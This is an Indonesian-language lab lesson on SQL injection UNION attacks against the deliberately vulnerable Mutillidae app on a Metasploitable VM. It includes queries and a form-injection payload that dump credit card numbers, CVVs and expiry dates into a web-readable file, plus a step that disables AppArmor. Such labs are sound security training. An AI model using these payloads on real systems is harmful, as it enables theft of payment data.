Lesson 9 - SQL Injection Union Exploit #2

# Penjelasan Database Union

  • Step 1 : Masuk ke dalam database Mutillidae di Metasploitable OS
su - root
mysql -uroot
use owasp10;
show tables;

didalam database terdapat tabel accounts dan credit_cards. 2 tabel tersebut akan kita union kan. UNION adalah operasi penggabungan lebih dari satu hasil SELECT dalam SQL

  • Step 2 : Melakukan operasi UNION

Operasi UNION menampilkan di terminal

select * from accounts where username RLIKE '^[0-9]' union select ccid, ccnumber, ccv, expiration, null from credit_cards;

Operasi UNION mencetak di file yang berlokasi di '/tmp/CCN.csv'

select * from accounts where username RLIKE '^[0-9]' union select ccid,ccnumber,ccv,expiration,null from credit_cards INTO OUTFILE '/tmp/CCN.csv' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED by '\n';
\! cat /tmp/CCN.csv

# SQL Injection

  • Step 1 : Buka http://10.151.36.64/mutillidae/ lalu masuk ke halaman user info. Pilih sidebar. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info

  • Step 2 : Ubah ukuran text box username menjadi 100% menggunakan inspect element agar text box lebih panjang untuk menuliskan syntax SQL Injection.

  • Step 3 : Matikan AppArmor pada Metasploitable OS dengan sudo /etc/init.d/apparmor stop AppArmor dalam OS turunan Ubuntu berfungsi untuk membatasi resource dari aktivitas-aktivitas sistem. Hal ini agar MySQL memiliki akses read/write di directori web app.

  • Step 4 : Masukkan operasi sql di bawah di dalam textbox Name lalu tekan tombol View Account Details

    ' union select ccid,ccnumber,ccv,expiration,null from credit_cards INTO DUMPFILE '/var/www/mutillidae/CCN2.txt' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n' --

    Dan jangan lupa untuk menambahkan 1 spasi diakhir, "-- ". Operasi ini adalah tidak akan menampilkan hasil, justru Authentication Error. Namun disisi lain akan membuat file CCN2.txt

  • Step 5 : Melihat hasil operasi dengan web browser http://10.151.36.64/mutillidae/CCN2.txt
  • Step 6 : Melihat hasil operasi dengan web browser curl --location 10.151.36.64/mutillidae/CCN2.txt

results matching ""

    No results matching ""